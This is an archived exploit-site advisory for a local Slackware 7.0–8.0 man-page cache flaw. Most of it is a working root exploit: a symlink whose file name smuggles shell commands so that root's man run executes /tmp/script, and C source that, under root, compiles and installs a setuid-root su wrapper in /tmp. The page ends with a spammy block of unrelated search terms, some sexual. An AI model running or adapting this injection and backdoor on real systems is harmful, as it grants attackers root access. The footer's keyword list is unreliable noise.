about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Slackware Malicious Manual Page Cache File Creation Vulnerability


Title Slackware Malicious Manual Page Cache File Creation Vulnerability
Published 2001-07-17-12:00AM
Updated 2001-07-18-11:17AM
Class Configuration Error
CVE   CVE-MAP-NOMATCH
Remote  No
Local  Yes
Credit  Reported to Bugtraq by <josh@pulltheplug.org> on July 17, 2001.
Vulnerable  Slackware Linux 8.0
Slackware Linux 7.1
Slackware Linux 7.0
Not Vulnerable  
Code   The following method of exploitation has been suggested by <josh@pulltheplug.org>:

ln -s "/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;export PATH=.;script;man.7" /var/man/cat7/man.7.gz

When `/usr/bin/man man` is executed by root, it will create
/var/man/cat7/man.1.gz. The symlink forces it to create a file in /usr/man/man7 named:
"/usr/man/man7/man.7.gz;cd;cd ..;cd ..;cd ..;cd ..;cd tmp;exportPATH=.;script;man.7.gz."

/usr/bin/man will then execute /tmp/script which contains:

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <errno.h>

int main()
{
FILE *fil;
mode_t perm = 06711;

if(!getuid()) {
fil = fopen("/tmp/bleh.c","w");
fprintf(fil,"%s ","#include <unistd.h>");
fprintf(fil,"%s ","#include <stdio.h>");
fprintf(fil,"%s ","int main() {");
fprintf(fil,"%s ","setreuid(0,0);setregid(0,0);");
fprintf(fil,"%s ","execl("/bin/su","su",NULL);");
fprintf(fil,"%s ","return 0; }");
fclose(fil);
system("/usr/bin/gcc -o /tmp/bleh /tmp/bleh.c");
unlink("/tmp/bleh.c");
chmod("/tmp/bleh", perm);
}
execl("/usr/bin/man","man","/usr/man/man7/man.7.gz",NULL);
return 0;
}
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 08:03:37 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Www.asian. blog.7upp. p...com.br p...com.br p...com.br WWW.WOLD.S Crack+Data p...com.br www.kilase RFB 003. t549t sexr Wprldsex.c Invision P www.86el.c ga0e.yikuo sawt indiy orcuit Nayandaras Tetek tant news for c saniyavide sex in alg www.yggzxx Free xxx v MELINA NAK yamowx.com Dunwonload Gangester local expl dnsmasq WWW.WOLD.S Seks horse backup.cgi Gmail Cale Shcool sek Porno Sand mysql nt www.zhuanf 2.4.26my Animals se bombay sto www.meitux tenjho ten trample www.trish Sexy wemen news for c six vidwo linux 2.4.